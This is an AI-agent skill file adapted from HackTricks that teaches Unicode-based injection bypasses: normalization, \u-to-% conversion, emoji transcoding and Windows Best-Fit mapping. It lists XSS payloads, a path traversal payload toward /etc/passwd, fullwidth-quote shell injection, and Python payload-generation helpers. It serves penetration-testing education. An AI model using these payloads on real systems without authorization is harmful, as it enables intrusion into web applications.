Hacktricks-skills unicode-injection-pentest

How to find and exploit Unicode injection vulnerabilities in web applications. Use this skill whenever you're testing for XSS, SQLi, or other injection vulnerabilities and want to try Unicode-based bypass techniques. Trigger this when you encounter input validation, WAF filters, or encoding issues that might be vulnerable to Unicode normalization attacks, emoji injection, or Windows Best-Fit character mapping exploits.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/unicode-injection/unicode-injection/SKILL.MD

Unicode Injection Pentesting

A skill for discovering and exploiting Unicode injection vulnerabilities in web applications.

Overview

Unicode injection vulnerabilities occur when a back-end or front-end system transforms unusual Unicode characters in unexpected ways. An attacker can use these transformations to slip characters past input filters and exploit injection vulnerabilities such as XSS or SQLi.

Attack Vectors

1. Unicode Normalization Attacks

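When it happens: The system normalizes or otherwise transforms user input after validating it (e.g., Unicode normalization or uppercase/lowercase conversion).

How it works: Compatibility normalization (NFKC/NFKD) folds some non-ASCII characters into their ASCII equivalents, so a character that passed the filter becomes a dangerous one afterwards.

Example:

Input: ＜ (\uff1c, fullwidth less-than sign)
After NFKC normalization: < (\u003c)
Result: < character injected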

Testing approach:

  1. Identify input fields with case conversion or normalization
  2. Send Unicode characters that normalize to dangerous ASCII
  3. Check if the normalized output bypasses filters
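The validate-then-normalize flaw can be reproduced locally with Python's standard `unicodedata` module. This is a minimal sketch: `naive_filter` and `process` are hypothetical stand-ins for a target's validation and processing steps, not code from any real application.

```python
import unicodedata


def naive_filter(value: str) -> bool:
    """Hypothetical validation: accept input only if it has no ASCII angle brackets."""
    return "<" not in value and ">" not in value


def process(value: str) -> str:
    """Hypothetical back-end that validates first and normalizes afterwards (unsafe order)."""
    if not naive_filter(value):
        raise ValueError("blocked by filter")
    return unicodedata.normalize("NFKC", value)


# Fullwidth less-than (U+FF1C) and greater-than (U+FF1E) pass the filter as-is.
payload = "\uff1cimg src=x onerror=alert(1)\uff1e"
result = process(payload)
print(result)  # <img src=x onerror=alert(1)>
```

Swapping the order (normalize first, then validate) makes the same payload fail the filter, which is a quick way to confirm that the ordering is the root cause.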

2. \u to % Conversion Attacks

When it happens: The backend rewrites the \u prefix of a Unicode escape to % (URL-encoding style).

How it works: \u3c4b becomes %3c4b, which URL-decodes to <4b, injecting <.
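A minimal sketch of this transformation, assuming a back-end that literally replaces `\u` with `%` and then URL-decodes the result. The function name `backend_transform` is hypothetical; real applications may perform the two steps in different layers.

```python
from urllib.parse import unquote


def backend_transform(raw: str) -> str:
    """Hypothetical back-end step: rewrite the \\u prefix to %, then URL-decode."""
    percent_form = raw.replace("\\u", "%")  # "\u3c4b" -> "%3c4b"
    return unquote(percent_form)            # "%3c" decodes to "<", "4b" is left over


decoded = backend_transform("\\u3c4b")
print(decoded)  # <4b
```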

Testing approach:

  1. Find Unicode characters whose \u representation begins with the hex code of the character you want to inject (e.g., \u3c.. for <)
  2. Send them to the application
  3. Check if the backend converts \u to %
  4. Verify if URL decoding creates injection characters
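Step 1 can be automated by enumerating assigned code points whose first two hex digits match the target ASCII character. The sketch below uses only the standard library; `candidates_for` and `escape_form` are illustrative helper names, and which candidates a given application accepts still has to be tested.

```python
import unicodedata


def candidates_for(target: str, limit: int = 5) -> list[str]:
    """Return assigned code points U+XXYY whose high byte XX equals ord(target)."""
    high = ord(target)
    found = []
    for low in range(0x100):
        ch = chr((high << 8) | low)
        if unicodedata.name(ch, ""):  # an empty name means the code point is unassigned
            found.append(ch)
        if len(found) == limit:
            break
    return found


def escape_form(ch: str) -> str:
    """Render a character in \\uXXXX notation."""
    return f"\\u{ord(ch):04x}"


for ch in candidates_for("<"):
    print(ch, escape_form(ch))
```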

3. Emoji Injection Attacks

When it happens: Backends mishandle emoji encoding conversions.

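How it works: Encoding mismatches (e.g., Windows-1252 to UTF-8 to ASCII) can turn the bytes of an emoji into dangerous characters. For example, the last UTF-8 byte of 💋 is 0x8B, which Windows-1252 reads as ‹ and ASCII transliteration typically turns into <; the last byte of 💛 (0x9B) becomes > in the same way.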

Example payload:

💋img src=x onerror=alert(document.domain)//💛

Vulnerable pattern:

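// Escaping runs first, while the payload still contains no < or >
$str = htmlspecialchars($_GET["str"]);
// The UTF-8 bytes are misread as Windows-1252, so each emoji byte becomes its own character
$str = iconv("Windows-1252", "UTF-8", $str);
// Transliteration to ASCII then produces new, unescaped characters
$str = iconv("UTF-8", "ASCII//TRANSLIT", $str);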

Testing approach:

  1. Send emoji payloads with embedded injection code
  2. Check for encoding conversion chains
  3. Look for normalization to ASCII characters
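The conversion chain in the vulnerable pattern can be approximated in Python to see why the emoji payload survives escaping. This is a sketch under assumptions: `html.escape` stands in for `htmlspecialchars`, and the `TRANSLIT` table is a small assumed subset of what glibc's `//TRANSLIT` does, with every other non-ASCII character replaced by `?`. Real iconv output for those other characters may differ.

```python
import html

# Assumed subset of glibc's //TRANSLIT behaviour; not a complete table.
TRANSLIT = {
    "\u2039": "<",  # SINGLE LEFT-POINTING ANGLE QUOTATION MARK
    "\u203a": ">",  # SINGLE RIGHT-POINTING ANGLE QUOTATION MARK
    "\u2019": "'",  # RIGHT SINGLE QUOTATION MARK
}


def emulate_chain(value: str) -> str:
    """Approximate htmlspecialchars -> iconv(cp1252 to UTF-8) -> iconv(ASCII//TRANSLIT)."""
    escaped = html.escape(value, quote=True)
    # The UTF-8 bytes are reinterpreted as Windows-1252, one character per byte.
    misread = escaped.encode("utf-8").decode("cp1252", errors="replace")
    return "".join(ch if ord(ch) < 128 else TRANSLIT.get(ch, "?") for ch in misread)


payload = "\U0001F48Bimg src=x onerror=alert(document.domain)//\U0001F49B"
output = emulate_chain(payload)
print(output)
```

With this table the trailing bytes 0x8B and 0x9B of the two emoji come out as `<` and `>`, after the escaping step has already run.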

4. Windows Best-Fit/Worst-Fit Attacks

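When it happens: A Windows application handles Unicode (UTF-16) input but passes it through "A" (ANSI) APIs instead of "W" (wide) APIs, so Windows converts the string to the active ANSI code page using Best-Fit mapping.

How it works: Windows replaces Unicode characters that have no representation in the target ANSI code page with visually similar characters from that code page.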

Common mappings:

  • Characters mapped to / (0x2F) - path traversal
  • Characters mapped to \ (0x5C) - path traversal
  • Fullwidth double quotes (U+FF02) - argument injection

Example:

Input: ＂ (fullwidth double quote U+FF02)
After Best-Fit: " (ASCII double quote)
Result: Shell argument splitting

Testing approach:

  1. Check if target uses Windows with W→A API conversion
  2. Use worst.fit mapping to find character mappings
  3. Send Unicode characters that map to dangerous ASCII
  4. Test blacklist bypasses, path traversal, shell escape bypasses
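Best-Fit conversion itself only happens inside Windows, but its effect on a blacklist can be modelled offline. The sketch below is a simulation, not a call into the Windows API: `BEST_FIT_SUBSET` is a small illustrative table whose entries are assumptions to confirm against the worst.fit mappings for the target code page, and `blacklist_ok` is a hypothetical filter.

```python
# Illustrative subset only; actual mappings depend on the target's ANSI code page.
BEST_FIT_SUBSET = {
    "\uff02": '"',   # FULLWIDTH QUOTATION MARK
    "\uff0f": "/",   # FULLWIDTH SOLIDUS
    "\uff3c": "\\",  # FULLWIDTH REVERSE SOLIDUS
    "\u2215": "/",   # DIVISION SLASH
}


def simulate_best_fit(value: str) -> str:
    """Model the wide-to-ANSI conversion for the characters in the table above."""
    return "".join(BEST_FIT_SUBSET.get(ch, ch) for ch in value)


def blacklist_ok(value: str) -> bool:
    """Hypothetical filter that rejects ASCII quotes and path separators."""
    return not any(ch in value for ch in '"/\\')


path = "..\u2215..\u2215secret.txt"
print(blacklist_ok(path), simulate_best_fit(path))
```

The filter accepts the input because it inspects the wide string, while the code that later consumes the ANSI string sees real separators.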

Testing Workflow

Step 1: Reconnaissance

  1. Identify input vectors: Forms, URL parameters, headers, file uploads
  2. Check for encoding: Look for iconv, htmlspecialchars, case conversion
  3. Determine platform: Windows vs Linux (affects Best-Fit applicability)
  4. Map the data flow: Where does input go? What transformations occur?

Step 2: Initial Testing

  1. Send basic Unicode: Test with common Unicode characters
  2. Check normalization: Look for case conversion or encoding changes
  3. Test emoji: Send emoji payloads with embedded code
  4. Try \u sequences: Send Unicode escape sequences

Step 3: Advanced Testing

  1. Use worst.fit mappings: Find characters that map to dangerous ASCII
  2. Test encoding chains: Multiple conversions can create vulnerabilities
  3. Bypass blacklists: Use Unicode equivalents of blocked characters
  4. Path traversal: Map characters to / and \
  5. Shell injection: Use fullwidth quotes for argument splitting
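For the blacklist-bypass step, one common source of Unicode equivalents is the fullwidth block, where U+FF01 to U+FF5E mirror ASCII U+0021 to U+007E at a fixed offset of 0xFEE0. The helper below is a sketch with a hypothetical name, `substitute_blocked`; whether the target folds these characters back to ASCII has to be verified per application.

```python
import unicodedata

FULLWIDTH_OFFSET = 0xFEE0  # distance between ASCII "!" (U+0021) and fullwidth "！" (U+FF01)


def substitute_blocked(payload: str, blocked: str) -> str:
    """Replace only the blocked ASCII characters with their fullwidth forms."""
    return "".join(
        chr(ord(ch) + FULLWIDTH_OFFSET) if ch in blocked and 0x21 <= ord(ch) <= 0x7E else ch
        for ch in payload
    )


probe = substitute_blocked("<script>alert(1)</script>", "<>/")
print(probe)
# If the target applies NFKC after filtering, the original payload comes back.
print(unicodedata.normalize("NFKC", probe))
```

Substituting only the blocked characters keeps the rest of the payload readable in logs and reduces the chance of tripping unrelated checks.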

Step 4: Verification

  1. Check output: Does the injection work?
  2. Review logs: What did the backend receive?
  3. Test impact: Can you execute code, read files, etc.?
  4. Document findings: Save payloads and results

Common Payloads

XSS via Unicode

\u3c4b<script>alert(1)</script>\u3e4b
💋<img src=x onerror=alert(1)>💛

Path Traversal via Best-Fit

/\u2215..\u2215etc\u2215passwd  # Characters mapping to /
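The \uXXXX notation in these payloads is shorthand for the actual characters. A small helper can expand it and percent-encode the result as UTF-8 for use in a query string. This is a sketch with hypothetical helper names; for the \u to % attack the literal escape text may need to be sent instead, depending on where the target performs the rewrite.

```python
import re
from urllib.parse import quote


def expand_escapes(payload: str) -> str:
    """Turn literal \\uXXXX sequences into the characters they denote."""
    return re.sub(
        r"\\u([0-9a-fA-F]{4})",
        lambda m: chr(int(m.group(1), 16)),
        payload,
    )


def to_query_value(payload: str) -> str:
    """Expand escapes, then percent-encode every byte of the UTF-8 form."""
    return quote(expand_escapes(payload), safe="")


print(to_query_value("\\u2215etc\\u2215passwd"))
```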

Shell Injection via Fullwidth Quotes

"\uff02ls\uff02  # Fullwidth quotes that become ASCII quotes

Important Notes

  1. Windows Best-Fit requires W→A API conversion: Not all Windows apps are vulnerable
  2. Encoding matters: UTF-8, Windows-1252, ASCII conversions create different behaviors
  3. Some vulnerabilities won't be fixed: Best-Fit is a Windows feature, not a bug
  4. Test in context: What works depends on the specific application and platform

When to Use This Skill

  • Testing input validation and WAF bypasses
  • Investigating XSS or SQLi that seems filtered
  • Analyzing encoding-related issues
  • Pentesting Windows-based web applications
  • Reviewing applications with Unicode handling
  • When standard injection payloads are blocked

Safety and Ethics

  • Only test systems you have authorization to test
  • Document all findings for remediation
  • Unicode injection can have unintended side effects
  • Some exploits may cause application crashes or data corruption